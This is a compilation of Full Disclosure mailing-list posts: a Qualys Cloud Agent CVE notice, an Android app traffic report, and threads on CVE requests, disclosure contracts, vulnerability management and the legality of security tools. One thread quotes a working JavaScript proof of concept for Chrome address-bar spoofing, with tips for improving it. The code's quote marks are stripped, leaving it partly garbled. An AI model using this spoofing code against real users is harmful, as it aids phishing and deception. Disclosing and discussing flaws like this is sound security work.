[FD] Multiple vulnerabilities discovered in Qualys Cloud Agent
The Unqork Security team discovered multiple security vulnerabilities in the Qualys Cloud Agent, to include arbitrary code execution. CVE-2022-29549 (Arbitrary Code Execution) https://nvd.nist.gov/vuln/detail/CVE-2022-29549 CVE-2022-29550 (Sensitive Information Disclosure) https://nvd.nist.gov/vuln/detail/CVE-2022-29550 Read more: https://www.unqork.com/resources/unqork-and-qualys-partner-to-resolve-zero-day-vulnerabilities https://blog.qualys.com/product-tech/2022/08/15/qualys-security-updates-cloud-agent-for-linux Daniel Wood Head of Product Security, Unqork -- **This e-mail, and any attachments thereto, is intended only for use by the addressee(s) named herein and may contain legally privileged and/or confidential information. If you are not the intended recipient of this e-mail, you are hereby notified that any dissemination, distribution or copying of this e-mail, and any attachments thereto, is strictly prohibited. If you have received this e-mail in error, please notify me by replying to this message and permanently delete the original and any copy of this e-mail and any printout thereof.** ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Re: [FD] 360 security android app snoops data to China Unicom network via insecure HTTP
Can't you just run the app in an Android emulator and shark it? Sent from my iPhone > On Apr 30, 2017, at 06:02, secli...@email.tg wrote: > > I have a further update on the issue. After uninstalling the 360 security > android app, I found after repeated checks of Network Info on my phone via > the Ping & DNS app that even then the HTTP connection to IP address > 123.125.114.8 still frequently showed up. So, I monitored the network > connections on my phone via the Network Connections app > (https://play.google.com/store/apps/details?id=com.antispycell.connmonitor) > and found that this time the HTTP connection to IP address 123.125.114.8 was > being established by the ES File Explorer app > (https://play.google.com/store/apps/details?id=com.estrongs.android.pop > (https://play.google.com/store/apps/details?id=com.estrongs.android.pop)). > So, it is possible that the insecure HTTP connection to the above IP address > that I observed when both the 360 security and ES File Explorer app were > installed on my phone was in fact because of the ES File Explorer app or the > other possibility is that both the apps have the same problem. I haven't had > a c ha > nce to re-install the 360 security app without the ES File Explorer to check > that and I don't intend to re-install the 360 security app on my phone, since > it anyways used to raise the temperature on my phone suspiciously. So, I will > report this as an issue for the ES File Explorer app in a separate email. > > Thanks. > Hi, > > I found the following review posted about the 360 security android app: > > https://play.google.com/store/apps/details?id=com.qihoo.security=Z3A6QU9xcFRPSG1HSTRaSVdNelVWY3FhZk5zcFlFMnZKeXRKRHhhQUE4VU9pLWV4UFBxeHJ3Xy1ZZWU2bEpOLTg0eGxzczFCV0lkaWxxTHRzZTQ4RWxzU2c > > (https://play.google.com/store/apps/details?id=com.qihoo.security=Z3A6QU9xcFRPSG1HSTRaSVdNelVWY3FhZk5zcFlFMnZKeXRKRHhhQUE4VU9pLWV4UFBxeHJ3Xy1ZZWU2bEpOLTg0eGxzczFCV0lkaWxxTHRzZTQ4RWxzU2c) > "Snoops data to China Unicom via insecure HTTP link! Found while checking > Network info on my device with this app installed that it had established an > insecure HTTP connection to an IP address(123.125.114.8) on Chinese state > owned China Unicom network (China Unicom owns a stake in app developer via > Qihoo 360). Also, when installed, found my phone temperature rising > frequently indicating covert data transfer from my phone. I've now > uninstalled this Chinese spying app & advice the same to anyone using the > app. Resp to comment: updated above info with IP addr. > 360 Mobile Security Limited April 26, 2017 Hi, sorry for the inconvenience. > It will be helpful for us to solve the problem, if you can give us more > information and details . Attaching some screenshots would be helpful. Please > contact us by email: je...@mobimagic.com (mailto:je...@mobimagic.com). Many > thanks." > > I observed the same behavior when I had this app installed on my smartphone. > I checked the Network Info on my phone when this app was installed, using the > Ping & DNS > app(https://play.google.com/store/apps/details?id=com.ulfdittmer.android.ping > (https://play.google.com/store/apps/details?id=com.ulfdittmer.android.ping)) > and found the insecure HTTP connection to the above IP address. After I > uninstalled the app, the HTTP connection to the above IP address was gone, as > well. On checking the WHOIS info(https://www.whois.com/whois/123.125.114.8 > (https://www.whois.com/whois/123.125.114.8)) for this IP address it can be > seen that it is indeed on the Chinese state-owned China Unicom network. I had > App usage tracking permission on Android enabled for this app, to facilitate > phone temperature reduction, when I observed the above. > > Can other security researchers please check and comment on this security hole? > > Thanks. > > ___ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69)
with Safari.
DW
Sent from my iPad
On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam m...@musalbas.com wrote:
That's pretty neat. Played around with this and made a few discoveries.
1. It shows a valid certificate when you spoof HTTPS sites. That's really
bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc
2. The page isn't responsive when using this flaw. That means you can't spoof
a login box for example. (I tried.)
3. The success of the exploit seems to depend on if the browser can start
loading content.html fast enough. I noticed that the exploit works 100% of
the time when used locally. Perhaps a better version of the exploit would
somehow preload content.html - for example by opening a window with an URL
that starts with javascript: followed by a script to display the content?
That, or perhaps reducing the interval time for trying to run next() after
the popup is created.
I wonder if this works on any other browsers?
MustafaOn 30 Jun 2015 7:08 am, David Leo david@deusen.co.uk wrote:
Impact:
The click to verify thing is completely broken...
Anyone can be BBB Accredited Business etc.
You can make whitehouse.gov display We love Islamic State :-)
Note:
No user interaction on the fake page.
Code:
* index.html
script
function next()
{
w.location.replace('http://www.oracle.com/index.html?'+n);n++;
setTimeout(next();,15);
setTimeout(next();,25);
}
function f()
{
w=window.open(content.html,_blank,width=500 height=500);
i=setInterval(try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();},5);
}
/script
a href=# onclick=f()Go/abr
* content.html
bThis web page is NOT oracle.com/b
scriptlocation=http://www.oracle.com/index.html;;/script
* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says June/16/2015 - it works as we tested today)
Request For Comment:
We reported this to Google.
They reproduced, and say
It's DoS which doesn't matter.
We think it's very strange,
since the browser does not crash(not DoS),
and the threat is obvious.
What's your opinion?
Kind Regards,
PS
We love clever tricks.
We love this:
http://dieyu.org/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Regarding how can I request a CVE number?
Unfortunately, this has been happening to many people within the last year. My suggestion is to assign your own numbering schema to them and post the details. If they gain momentum then you may get one assigned anyway if it's serious enough. Sent from my iPhone On Mar 18, 2015, at 6:32 AM, James Hooker seidrhr...@googlemail.com wrote: Hi XZ, I managed to get a number of CVEs last year, but towards the end of the year they simply stopped replying, so I've given up. Whether they stopped replying due to work load, or whether my submissions were not up to their requirements I'm not sure. If you find out any more, I'd be interested in knowing why they've stopped assigning CVEs to certain submission sources. Kind regards, James H On Tue, Mar 17, 2015 at 11:25 PM, XiaopengZhang tfr...@yeah.net wrote: Hi Guys, I discovered several Vuls and have reported them to the vendors, so I'd like to request the CVE for them.(The vendor did not want to request CVE) I ever sent some emails to cve-ass...@mitre.org for applying for CVE. But so far still nobody replys them. I dont know what happend about this email box. Is my email recognised as spam? Or do I need write the email content in a special format? So please, can somebody here help me? Thanks Best wishes, XZ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Responsible disclosure: terms and conditions
Should also point out that getting EO insurance is a good idea. Daniel On Jun 8, 2014, at 1:34 PM, Dave Warren da...@hireahit.com wrote: On 2014-06-08 04:03, Paul Vixie wrote: this is concerning, for two reasons. first, for enforceability, a contract requires exchange of consideration. what's yours? i can see that the vendor is receiving something of value (the disclosure) but it's not clear what you're getting in return beyond the opportunity to have your good deeds go unpunished. absence of a negative does not amount to a positive in the eyes of the law. Indemnity is definitely consideration. I'm not sure that 1- You will not attempt to threaten or prosecute the researcher in any jurisdiction. is sufficient though, but something similar in appropriate legalese would possibly do the trick. There also needs to be an enforcement or penalty clause that is mutually agreeable (and this is probably where most companies will start to wonder if agreeing is worthwhile). A contact without an enforcement clause is mostly useless since a violation will, at most, allow the opposing party to disregard the contract. This works great in a I will mow your lawn as needed for $80/week contract, in which case in the event of a breach, the other party would stop complying with their terms. In this case, the vendor has on ongoing obligation to not sue, whereas the researcher has completed their portion as soon as they reveal the information to the company (or as soon as they complete a defined responsible disclosure period). If the company chooses to pursue legal action against the researcher, the researcher has no remedy in the contract. At a minimum, agreeing to limit damages in the event of any and all legal actions resulting from researching and disclosing the vulnerability would be a start. Still, I like the idea, especially if it's something that a reasonable number of researchers use. -- Dave Warren http://www.hireahit.com/ http://ca.linkedin.com/in/davejwarren ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Responsible disclosure: terms and conditions
Keep in mind you can always be sued. No matter what 'legal' document you may have. I'm the third down on that attrition list. This brings to mind this recent blog from John Strand: http://pen-testing.sans.org/blog/pen-testing/2014/06/04/five-things-every-pen-tester-should-know-about-working-with-lawyers Not specifically regarding disclosure but worth the read. Daniel On Jun 8, 2014, at 7:03 AM, Paul Vixie p...@redbarn.org wrote: Pedro Ribeiro wrote: ... I am not a lawyer, so I would like everyone's opinion (lawyer or not) on whether this would actually provide any protection. i am not a lawyer either. i started MAPS, the first anti-spam company, in 1997 or so, and became the most-sued person i know. i may be the most-sued person you'll ever know. and i've been sued by some experts. so: I had this idea of making Terms Conditions that you would send to a vendor prior to disclosing the vulnerabilities. The vendor (or someone responsible) would have to accept these terms by replying to your email and only then you would reveal the vulnerabilities. If they didn't accept, you would release them to the public (full disclosure) immediately. this is concerning, for two reasons. first, for enforceability, a contract requires exchange of consideration. what's yours? i can see that the vendor is receiving something of value (the disclosure) but it's not clear what you're getting in return beyond the opportunity to have your good deeds go unpunished. absence of a negative does not amount to a positive in the eyes of the law. you're also treating this as a one-off. i suggest you make it continuous, and make continuity be a value they are trading for. so, make this a relatively standard bilateral NDA stating the violation by them will result in (a) cancellation of the NDA, (b) unwillingness by you to enter into another NDA with them for three years, and (c) naming and shaming them for who they are and what they did, over on slashdot. it's generally good text other than these structural matters. you'll want a real lawyer to look at it before you try to use it, and maybe before you process my suggestion above. we have two non-practicing lawyers in the computer security field, david dagon and anne mitchell. let me know if you'd like an introduction to either. vixie ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] So You Like Pain and Vulnerability Management? New Article.
Pedro, I think you misinterpreted the article. I can see how his writing style can be confusing with all the joking and contradictions throughout. I had to reread it twice to make sure I was taking away what was intended Just to be clear though, I agree and don't think it really adds value for those of us that already do vulnerability management, however, if written clearer, I could see this as being beneficial to those that don't understand VM and to drive away the misconception that VM is just patching and will make you secure. One thing I would like to see us get away from as a community is silo'ing VM as something special. I think we need to be more holistic and include threats (TVM) as part of the larger picture. Doing so increases you VM ROI and actually gets you closer to a more secure baseline as you can select appropriate controls (caveat: if done properly). Daniel On May 13, 2014, at 5:40 AM, Pedro Ribeiro ped...@gmail.com wrote: On 12 May 2014 19:48, Pete Herzog li...@isecom.org wrote: Hi, I’m your friend and security researcher, Pete Herzog. You might know me from other public service announcements such as the widely anticipated, upcoming workshop Secrets of Security, and critic’s choice award winners: Teaching Your Teen to Hack Police Cars, and Help! My Monkey is Posting Pictures to Facebook! But I’m here today to take a moment and talk to you about the pain of neglect, isolation, abuse, and infection, better known as “vulnerability management”. In many ways vulnerability management can be part of a healthy system and over-all good security. But there’s many important differences between vulnerability management and security that you should know about: That's how my new article starts. 5 points on the pain of vulnerability management and how to make it hurt less. It's posted here: http://www.tripwire.com/state-of-security/vulnerability-management/so-you-like-pain-and-vulnerability-management/ Feel free to discuss with me on Twitter @peteherzog and #securitypain and #helpmymonkeyispostingpicturestofacebook ;) Sincerely, -pete. -- Pete Herzog - Managing Director - p...@isecom.org Hi, I fail to see the point of the article and I think you are making some major assumptions here while at the same time stating the obvious. First, who is the audience of the article? As a vulnerability manager myself I find insulting that you think that I don't know that finding vulnerabilities by itself without ANY other security controls will make my employer secure. Secondly, you are saying that vulnerability management = scanning something with a vulnerability scanner, review the output and patch. As it says on Wikipedia, it is much more than that - it is the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities [¹]. So at the very least I would define it as identifying possible vulnerabilities with various tools - scanners, internal and external pentests, source code review, fuzzing, bug reports, etc - and managing their life cycle to the end by either patching, putting a control in place or even signing it off as an acceptable risk. Also you seem to focus solely on the problem of patching closed source software. But nowadays most of the attacks are done via the Web layer, and in most companies the Web layer is developed in house. So you can much more effectively find vulnerabilities with a source code review than just patching them as they appear. As the article seems to imply, vulnerability management is about reducing the risk and the overall attack surface. But I thought this was common knowledge, especially among people who consider themselves vulnerability managers? Regards Pedro [¹] http://en.m.wikipedia.org/wiki/Vulnerability_management ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Legality of Open Source Tools
Toni, The English version has this information in Chapter 38, I didn't find it in a Chapter 34. The key to all this is the language of intent, using verbiage such as aggravated, unlawful, and to cause detriment. This is the same as the United States and many other countries; if you don't have the intention to cause harm, it can be argued as a lack of 'mens rea' which is Latin for guilty mind. In order for it to be considered a crime (legally speaking at least in the United States) you need that key component with the actual act of committing the crime (known as 'actus reus'). I'm not saying that Finland or any other country is the same as the United States, but having studied Criminal Law, I do know that many countries have similar code on the books. If you're truly concerned, I would write or speak to your court representative for clarification. Daniel On Apr 5, 2014, at 6:23 AM, Toni Korpela ad...@xorfork.com wrote: Greetings from Finland. I know that here it is illegal to import, manufacture, sell or otherwise distribute such machine or software which are designed to endanger or harm information and communication systems. This is stated in chapter 34 § 9a. Then again § 9b states that it is illegal to posess machine, software and access information into systems which you can use to endanger or harm information and communication systems. Basically this means that I am not allowed to have ping, nmap or other networking / penetration testing tools which can be used for harm installed on my computer. Though I am not certain if any of these computer security laws have been used to penalize someone. I am not certain if penetration testing tools belong to the category of tools which are designed to endanger or harm information and communication systems. It's quite harsh if I could get fines or maximum of 2 years jail for having Linux distribution with some networking tools installed on my computer. -Toni ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
